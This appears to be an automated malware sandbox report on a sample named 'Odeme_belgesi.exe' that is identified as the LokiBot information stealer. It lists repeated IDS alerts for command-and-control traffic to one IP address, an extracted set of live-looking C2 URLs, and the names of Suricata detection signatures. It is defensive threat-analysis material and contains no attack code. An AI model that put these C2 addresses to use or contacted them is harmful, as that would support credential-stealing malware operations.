            2024-10-01T10:55:50.343657+020020216411A Network Trojan was detected192.168.2.44978245.66.231.24280TCP
            2024-10-01T10:55:51.144817+020020216411A Network Trojan was detected192.168.2.44978345.66.231.24280TCP
            2024-10-01T10:55:52.156456+020020216411A Network Trojan was detected192.168.2.44978445.66.231.24280TCP
            2024-10-01T10:55:53.192942+020020216411A Network Trojan was detected192.168.2.44978645.66.231.24280TCP
            2024-10-01T10:55:53.988611+020020216411A Network Trojan was detected192.168.2.44978745.66.231.24280TCP
            2024-10-01T10:55:54.958720+020020216411A Network Trojan was detected192.168.2.44978845.66.231.24280TCP
            2024-10-01T10:55:55.793611+020020216411A Network Trojan was detected192.168.2.44978945.66.231.24280TCP
            2024-10-01T10:55:56.591640+020020216411A Network Trojan was detected192.168.2.44979045.66.231.24280TCP
            2024-10-01T10:55:57.452108+020020216411A Network Trojan was detected192.168.2.44979145.66.231.24280TCP
            2024-10-01T10:55:58.764642+020020216411A Network Trojan was detected192.168.2.44979245.66.231.24280TCP
            2024-10-01T10:55:59.680645+020020216411A Network Trojan was detected192.168.2.44979345.66.231.24280TCP
            2024-10-01T10:56:00.513321+020020216411A Network Trojan was detected192.168.2.44979445.66.231.24280TCP
            2024-10-01T10:56:10.439429+020020216411A Network Trojan was detected192.168.2.44979545.66.231.24280TCP
            2024-10-01T10:56:11.353855+020020216411A Network Trojan was detected192.168.2.44979645.66.231.24280TCP
            2024-10-01T10:56:12.182284+020020216411A Network Trojan was detected192.168.2.44979745.66.231.24280TCP
            2024-10-01T10:56:13.048624+020020216411A Network Trojan was detected192.168.2.44979845.66.231.24280TCP
            2024-10-01T10:56:13.911144+020020216411A Network Trojan was detected192.168.2.44979945.66.231.24280TCP
            2024-10-01T10:56:14.813722+020020216411A Network Trojan was detected192.168.2.44980045.66.231.24280TCP
            2024-10-01T10:56:15.707475+020020216411A Network Trojan was detected192.168.2.44980145.66.231.24280TCP
            2024-10-01T10:56:16.758460+020020216411A Network Trojan was detected192.168.2.44980245.66.231.24280TCP
            2024-10-01T10:56:17.789425+020020216411A Network Trojan was detected192.168.2.44980345.66.231.24280TCP
            2024-10-01T10:56:21.729047+020020216411A Network Trojan was detected192.168.2.44980445.66.231.24280TCP
            2024-10-01T10:56:22.932407+020020216411A Network Trojan was detected192.168.2.44980545.66.231.24280TCP
            2024-10-01T10:56:23.914707+020020216411A Network Trojan was detected192.168.2.44980645.66.231.24280TCP
            2024-10-01T10:56:27.790640+020020216411A Network Trojan was detected192.168.2.44980745.66.231.24280TCP
            2024-10-01T10:56:28.717307+020020216411A Network Trojan was detected192.168.2.44980845.66.231.24280TCP
            2024-10-01T10:56:29.548372+020020216411A Network Trojan was detected192.168.2.44980945.66.231.24280TCP
            2024-10-01T10:56:30.403711+020020216411A Network Trojan was detected192.168.2.44981045.66.231.24280TCP
            2024-10-01T10:56:31.360698+020020216411A Network Trojan was detected192.168.2.44981145.66.231.24280TCP
            2024-10-01T10:56:32.244487+020020216411A Network Trojan was detected192.168.2.44981245.66.231.24280TCP
            2024-10-01T10:56:33.078751+020020216411A Network Trojan was detected192.168.2.44981345.66.231.24280TCP
            2024-10-01T10:56:34.264055+020020216411A Network Trojan was detected192.168.2.44981445.66.231.24280TCP
            2024-10-01T10:56:35.118822+020020216411A Network Trojan was detected192.168.2.44981545.66.231.24280TCP
            2024-10-01T10:56:36.007121+020020216411A Network Trojan was detected192.168.2.44981645.66.231.24280TCP
            2024-10-01T10:56:37.076989+020020216411A Network Trojan was detected192.168.2.44981745.66.231.24280TCP
            2024-10-01T10:56:37.993838+020020216411A Network Trojan was detected192.168.2.44981845.66.231.24280TCP
            2024-10-01T10:56:38.817577+020020216411A Network Trojan was detected192.168.2.44981945.66.231.24280TCP
            2024-10-01T10:56:39.675484+020020216411A Network Trojan was detected192.168.2.44982045.66.231.24280TCP
            2024-10-01T10:56:40.543640+020020216411A Network Trojan was detected192.168.2.44982145.66.231.24280TCP
            2024-10-01T10:56:41.469900+020020216411A Network Trojan was detected192.168.2.44982245.66.231.24280TCP
            2024-10-01T10:56:42.355681+020020216411A Network Trojan was detected192.168.2.44982345.66.231.24280TCP
            2024-10-01T10:56:43.346923+020020216411A Network Trojan was detected192.168.2.44982445.66.231.24280TCP
            2024-10-01T10:56:44.250217+020020216411A Network Trojan was detected192.168.2.44982545.66.231.24280TCP
            2024-10-01T10:56:45.124436+020020216411A Network Trojan was detected192.168.2.44982645.66.231.24280TCP
            2024-10-01T10:56:46.001925+020020216411A Network Trojan was detected192.168.2.44982745.66.231.24280TCP
            2024-10-01T10:56:46.932311+020020216411A Network Trojan was detected192.168.2.44982845.66.231.24280TCP
            2024-10-01T10:56:47.715173+020020216411A Network Trojan was detected192.168.2.44982945.66.231.24280TCP
            2024-10-01T10:56:48.656357+020020216411A Network Trojan was detected192.168.2.44983045.66.231.24280TCP
            2024-10-01T10:56:49.497277+020020216411A Network Trojan was detected192.168.2.44983145.66.231.24280TCP
            2024-10-01T10:56:50.315483+020020216411A Network Trojan was detected192.168.2.44983245.66.231.24280TCP
            2024-10-01T10:56:51.139744+020020216411A Network Trojan was detected192.168.2.44983345.66.231.24280TCP
            2024-10-01T10:56:52.030835+020020216411A Network Trojan was detected192.168.2.44983445.66.231.24280TCP
            2024-10-01T10:56:52.933070+020020216411A Network Trojan was detected192.168.2.44983545.66.231.24280TCP
            2024-10-01T10:56:53.939406+020020216411A Network Trojan was detected192.168.2.44983645.66.231.24280TCP
            2024-10-01T10:56:54.751235+020020216411A Network Trojan was detected192.168.2.44983745.66.231.24280TCP
            2024-10-01T10:56:55.562073+020020216411A Network Trojan was detected192.168.2.44983845.66.231.24280TCP
            2024-10-01T10:56:56.353977+020020216411A Network Trojan was detected192.168.2.44983945.66.231.24280TCP
            2024-10-01T10:56:57.296632+020020216411A Network Trojan was detected192.168.2.44984045.66.231.24280TCP
            2024-10-01T10:56:58.123183+020020216411A Network Trojan was detected192.168.2.44984145.66.231.24280TCP
            2024-10-01T10:56:59.239027+020020216411A Network Trojan was detected192.168.2.44984245.66.231.24280TCP
            2024-10-01T10:57:00.235929+020020216411A Network Trojan was detected192.168.2.44984345.66.231.24280TCP
            2024-10-01T10:57:01.169312+020020216411A Network Trojan was detected192.168.2.44984445.66.231.24280TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-01T10:54:59.017244+020028257661Malware Command and Control Activity Detected192.168.2.44973045.66.231.24280TCP
            2024-10-01T10:55:00.012405+020028257661Malware Command and Control Activity Detected192.168.2.44973145.66.231.24280TCP
            2024-10-01T10:55:01.012878+020028257661Malware Command and Control Activity Detected192.168.2.44973245.66.231.24280TCP
            2024-10-01T10:55:01.929584+020028257661Malware Command and Control Activity Detected192.168.2.44973345.66.231.24280TCP
            2024-10-01T10:55:02.838931+020028257661Malware Command and Control Activity Detected192.168.2.44973445.66.231.24280TCP
            2024-10-01T10:55:03.734897+020028257661Malware Command and Control Activity Detected192.168.2.44973545.66.231.24280TCP
            2024-10-01T10:55:04.791909+020028257661Malware Command and Control Activity Detected192.168.2.44973645.66.231.24280TCP
            2024-10-01T10:55:05.714856+020028257661Malware Command and Control Activity Detected192.168.2.44973745.66.231.24280TCP
            2024-10-01T10:55:06.689995+020028257661Malware Command and Control Activity Detected192.168.2.44973845.66.231.24280TCP
            2024-10-01T10:55:10.539446+020028257661Malware Command and Control Activity Detected192.168.2.44973945.66.231.24280TCP
            2024-10-01T10:55:11.431407+020028257661Malware Command and Control Activity Detected192.168.2.44974045.66.231.24280TCP
            2024-10-01T10:55:12.290926+020028257661Malware Command and Control Activity Detected192.168.2.44974145.66.231.24280TCP
            2024-10-01T10:55:13.156783+020028257661Malware Command and Control Activity Detected192.168.2.44974245.66.231.24280TCP
            2024-10-01T10:55:14.059014+020028257661Malware Command and Control Activity Detected192.168.2.44974445.66.231.24280TCP
            2024-10-01T10:55:15.181877+020028257661Malware Command and Control Activity Detected192.168.2.44974745.66.231.24280TCP
            2024-10-01T10:55:16.001641+020028257661Malware Command and Control Activity Detected192.168.2.44974945.66.231.24280TCP
            2024-10-01T10:55:17.057243+020028257661Malware Command and Control Activity Detected192.168.2.44975245.66.231.24280TCP
            2024-10-01T10:55:20.935914+020028257661Malware Command and Control Activity Detected192.168.2.44975345.66.231.24280TCP
            2024-10-01T10:55:21.808725+020028257661Malware Command and Control Activity Detected192.168.2.44975445.66.231.24280TCP
            2024-10-01T10:55:22.700322+020028257661Malware Command and Control Activity Detected192.168.2.44975545.66.231.24280TCP
            2024-10-01T10:55:23.622010+020028257661Malware Command and Control Activity Detected192.168.2.44975645.66.231.24280TCP
            2024-10-01T10:55:24.716379+020028257661Malware Command and Control Activity Detected192.168.2.44975745.66.231.24280TCP
            2024-10-01T10:55:25.534367+020028257661Malware Command and Control Activity Detected192.168.2.44975845.66.231.24280TCP
            2024-10-01T10:55:26.361457+020028257661Malware Command and Control Activity Detected192.168.2.44975945.66.231.24280TCP
            2024-10-01T10:55:27.260785+020028257661Malware Command and Control Activity Detected192.168.2.44976045.66.231.24280TCP
            2024-10-01T10:55:28.111446+020028257661Malware Command and Control Activity Detected192.168.2.44976145.66.231.24280TCP
            2024-10-01T10:55:28.997001+020028257661Malware Command and Control Activity Detected192.168.2.44976245.66.231.24280TCP
            2024-10-01T10:55:29.807741+020028257661Malware Command and Control Activity Detected192.168.2.44976345.66.231.24280TCP
            2024-10-01T10:55:30.730772+020028257661Malware Command and Control Activity Detected192.168.2.44976445.66.231.24280TCP
            2024-10-01T10:55:31.541452+020028257661Malware Command and Control Activity Detected192.168.2.44976545.66.231.24280TCP
            2024-10-01T10:55:32.344919+020028257661Malware Command and Control Activity Detected192.168.2.44976645.66.231.24280TCP
            2024-10-01T10:55:33.286078+020028257661Malware Command and Control Activity Detected192.168.2.44976745.66.231.24280TCP
            2024-10-01T10:55:34.118881+020028257661Malware Command and Control Activity Detected192.168.2.44976845.66.231.24280TCP
            2024-10-01T10:55:34.933166+020028257661Malware Command and Control Activity Detected192.168.2.44976945.66.231.24280TCP
            2024-10-01T10:55:35.839128+020028257661Malware Command and Control Activity Detected192.168.2.44977045.66.231.24280TCP
            2024-10-01T10:55:36.706651+020028257661Malware Command and Control Activity Detected192.168.2.44977145.66.231.24280TCP
            2024-10-01T10:55:37.524416+020028257661Malware Command and Control Activity Detected192.168.2.44977245.66.231.24280TCP
            2024-10-01T10:55:38.374178+020028257661Malware Command and Control Activity Detected192.168.2.44977345.66.231.24280TCP
            2024-10-01T10:55:39.385441+020028257661Malware Command and Control Activity Detected192.168.2.44977445.66.231.24280TCP
            2024-10-01T10:55:40.328121+020028257661Malware Command and Control Activity Detected192.168.2.44977545.66.231.24280TCP
            2024-10-01T10:55:41.381303+020028257661Malware Command and Control Activity Detected192.168.2.44977645.66.231.24280TCP
            2024-10-01T10:55:42.421721+020028257661Malware Command and Control Activity Detected192.168.2.44977745.66.231.24280TCP
            2024-10-01T10:55:43.589678+020028257661Malware Command and Control Activity Detected192.168.2.44977845.66.231.24280TCP
            2024-10-01T10:55:47.464644+020028257661Malware Command and Control Activity Detected192.168.2.44977945.66.231.24280TCP
            2024-10-01T10:55:48.292929+020028257661Malware Command and Control Activity Detected192.168.2.44978045.66.231.24280TCP
            2024-10-01T10:55:49.348506+020028257661Malware Command and Control Activity Detected192.168.2.44978145.66.231.24280TCP
            2024-10-01T10:55:50.343657+020028257661Malware Command and Control Activity Detected192.168.2.44978245.66.231.24280TCP
            2024-10-01T10:55:51.144817+020028257661Malware Command and Control Activity Detected192.168.2.44978345.66.231.24280TCP
            2024-10-01T10:55:52.156456+020028257661Malware Command and Control Activity Detected192.168.2.44978445.66.231.24280TCP
            2024-10-01T10:55:53.192942+020028257661Malware Command and Control Activity Detected192.168.2.44978645.66.231.24280TCP
            2024-10-01T10:55:53.988611+020028257661Malware Command and Control Activity Detected192.168.2.44978745.66.231.24280TCP
            2024-10-01T10:55:54.958720+020028257661Malware Command and Control Activity Detected192.168.2.44978845.66.231.24280TCP
            2024-10-01T10:55:55.793611+020028257661Malware Command and Control Activity Detected192.168.2.44978945.66.231.24280TCP
            2024-10-01T10:55:56.591640+020028257661Malware Command and Control Activity Detected192.168.2.44979045.66.231.24280TCP
            2024-10-01T10:55:57.452108+020028257661Malware Command and Control Activity Detected192.168.2.44979145.66.231.24280TCP
            2024-10-01T10:55:58.764642+020028257661Malware Command and Control Activity Detected192.168.2.44979245.66.231.24280TCP
            2024-10-01T10:55:59.680645+020028257661Malware Command and Control Activity Detected192.168.2.44979345.66.231.24280TCP
            2024-10-01T10:56:00.513321+020028257661Malware Command and Control Activity Detected192.168.2.44979445.66.231.24280TCP
            2024-10-01T10:56:10.439429+020028257661Malware Command and Control Activity Detected192.168.2.44979545.66.231.24280TCP
            2024-10-01T10:56:11.353855+020028257661Malware Command and Control Activity Detected192.168.2.44979645.66.231.24280TCP
            2024-10-01T10:56:12.182284+020028257661Malware Command and Control Activity Detected192.168.2.44979745.66.231.24280TCP
            2024-10-01T10:56:13.048624+020028257661Malware Command and Control Activity Detected192.168.2.44979845.66.231.24280TCP
            2024-10-01T10:56:13.911144+020028257661Malware Command and Control Activity Detected192.168.2.44979945.66.231.24280TCP
            2024-10-01T10:56:14.813722+020028257661Malware Command and Control Activity Detected192.168.2.44980045.66.231.24280TCP
            2024-10-01T10:56:15.707475+020028257661Malware Command and Control Activity Detected192.168.2.44980145.66.231.24280TCP
            2024-10-01T10:56:16.758460+020028257661Malware Command and Control Activity Detected192.168.2.44980245.66.231.24280TCP
            2024-10-01T10:56:17.789425+020028257661Malware Command and Control Activity Detected192.168.2.44980345.66.231.24280TCP
            2024-10-01T10:56:21.729047+020028257661Malware Command and Control Activity Detected192.168.2.44980445.66.231.24280TCP
            2024-10-01T10:56:22.932407+020028257661Malware Command and Control Activity Detected192.168.2.44980545.66.231.24280TCP
            2024-10-01T10:56:23.914707+020028257661Malware Command and Control Activity Detected192.168.2.44980645.66.231.24280TCP
            2024-10-01T10:56:27.790640+020028257661Malware Command and Control Activity Detected192.168.2.44980745.66.231.24280TCP
            2024-10-01T10:56:28.717307+020028257661Malware Command and Control Activity Detected192.168.2.44980845.66.231.24280TCP
            2024-10-01T10:56:29.548372+020028257661Malware Command and Control Activity Detected192.168.2.44980945.66.231.24280TCP
            2024-10-01T10:56:30.403711+020028257661Malware Command and Control Activity Detected192.168.2.44981045.66.231.24280TCP
            2024-10-01T10:56:31.360698+020028257661Malware Command and Control Activity Detected192.168.2.44981145.66.231.24280TCP
            2024-10-01T10:56:32.244487+020028257661Malware Command and Control Activity Detected192.168.2.44981245.66.231.24280TCP
            2024-10-01T10:56:33.078751+020028257661Malware Command and Control Activity Detected192.168.2.44981345.66.231.24280TCP
            2024-10-01T10:56:34.264055+020028257661Malware Command and Control Activity Detected192.168.2.44981445.66.231.24280TCP
            2024-10-01T10:56:35.118822+020028257661Malware Command and Control Activity Detected192.168.2.44981545.66.231.24280TCP
            2024-10-01T10:56:36.007121+020028257661Malware Command and Control Activity Detected192.168.2.44981645.66.231.24280TCP
            2024-10-01T10:56:37.076989+020028257661Malware Command and Control Activity Detected192.168.2.44981745.66.231.24280TCP
            2024-10-01T10:56:37.993838+020028257661Malware Command and Control Activity Detected192.168.2.44981845.66.231.24280TCP
            2024-10-01T10:56:38.817577+020028257661Malware Command and Control Activity Detected192.168.2.44981945.66.231.24280TCP
            2024-10-01T10:56:39.675484+020028257661Malware Command and Control Activity Detected192.168.2.44982045.66.231.24280TCP
            2024-10-01T10:56:40.543640+020028257661Malware Command and Control Activity Detected192.168.2.44982145.66.231.24280TCP
            2024-10-01T10:56:41.469900+020028257661Malware Command and Control Activity Detected192.168.2.44982245.66.231.24280TCP
            2024-10-01T10:56:42.355681+020028257661Malware Command and Control Activity Detected192.168.2.44982345.66.231.24280TCP
            2024-10-01T10:56:43.346923+020028257661Malware Command and Control Activity Detected192.168.2.44982445.66.231.24280TCP
            2024-10-01T10:56:44.250217+020028257661Malware Command and Control Activity Detected192.168.2.44982545.66.231.24280TCP
            2024-10-01T10:56:45.124436+020028257661Malware Command and Control Activity Detected192.168.2.44982645.66.231.24280TCP
            2024-10-01T10:56:46.001925+020028257661Malware Command and Control Activity Detected192.168.2.44982745.66.231.24280TCP
            2024-10-01T10:56:46.932311+020028257661Malware Command and Control Activity Detected192.168.2.44982845.66.231.24280TCP
            2024-10-01T10:56:47.715173+020028257661Malware Command and Control Activity Detected192.168.2.44982945.66.231.24280TCP
            2024-10-01T10:56:48.656357+020028257661Malware Command and Control Activity Detected192.168.2.44983045.66.231.24280TCP
            2024-10-01T10:56:49.497277+020028257661Malware Command and Control Activity Detected192.168.2.44983145.66.231.24280TCP
            2024-10-01T10:56:50.315483+020028257661Malware Command and Control Activity Detected192.168.2.44983245.66.231.24280TCP
            2024-10-01T10:56:51.139744+020028257661Malware Command and Control Activity Detected192.168.2.44983345.66.231.24280TCP
            2024-10-01T10:56:52.030835+020028257661Malware Command and Control Activity Detected192.168.2.44983445.66.231.24280TCP
            2024-10-01T10:56:52.933070+020028257661Malware Command and Control Activity Detected192.168.2.44983545.66.231.24280TCP
            2024-10-01T10:56:53.939406+020028257661Malware Command and Control Activity Detected192.168.2.44983645.66.231.24280TCP
            2024-10-01T10:56:54.751235+020028257661Malware Command and Control Activity Detected192.168.2.44983745.66.231.24280TCP
            2024-10-01T10:56:55.562073+020028257661Malware Command and Control Activity Detected192.168.2.44983845.66.231.24280TCP
            2024-10-01T10:56:56.353977+020028257661Malware Command and Control Activity Detected192.168.2.44983945.66.231.24280TCP
            2024-10-01T10:56:57.296632+020028257661Malware Command and Control Activity Detected192.168.2.44984045.66.231.24280TCP
            2024-10-01T10:56:58.123183+020028257661Malware Command and Control Activity Detected192.168.2.44984145.66.231.24280TCP
            2024-10-01T10:56:59.239027+020028257661Malware Command and Control Activity Detected192.168.2.44984245.66.231.24280TCP
            2024-10-01T10:57:00.235929+020028257661Malware Command and Control Activity Detected192.168.2.44984345.66.231.24280TCP
            2024-10-01T10:57:01.169312+020028257661Malware Command and Control Activity Detected192.168.2.44984445.66.231.24280TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000000.00000002.1689546707.0000000004478000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://solutviewmen.viewdns.net/bdifygidj/five/fre.php"]}
            Source: solutviewmen.viewdns.netVirustotal: Detection: 5%Perma Link
            Source: http://alphastand.trade/alien/fre.phpVirustotal: Detection: 13%Perma Link
            Source: http://kbfvzoboss.bid/alien/fre.phpVirustotal: Detection: 12%Perma Link
            Source: http://alphastand.win/alien/fre.phpVirustotal: Detection: 12%Perma Link
            Source: http://alphastand.top/alien/fre.phpVirustotal: Detection: 15%Perma Link
            Source: Odeme_belgesi.exeReversingLabs: Detection: 55%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: Odeme_belgesi.exeJoe Sandbox ML: detected
            Source: Odeme_belgesi.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: Odeme_belgesi.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\Odeme_belgesi.exeCode function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,1_2_00403D74

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49732 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49790 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49734 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49732 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49734 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49801 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49734 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49776 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49776 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49754 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49776 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49773 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49805 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49773 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49773 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49754 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49771 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49730 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49754 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49769 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49807 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49807 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49807 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49776 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49734 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49790 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49734 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49790 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49807 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49807 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49732 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49767 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49790 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49790 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49753 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49734
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49771 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49825 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49771 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49740 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49740 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49754 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49740 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49777 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49777 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49777 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49790
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49776 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49732 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49771 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49732 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49771 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49752 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49744 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49805 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49756 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49805 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49756 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49763 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49730 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49763 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49730 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49740 -> 45.66.231.242:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49805 -> 45.66.231.242:80
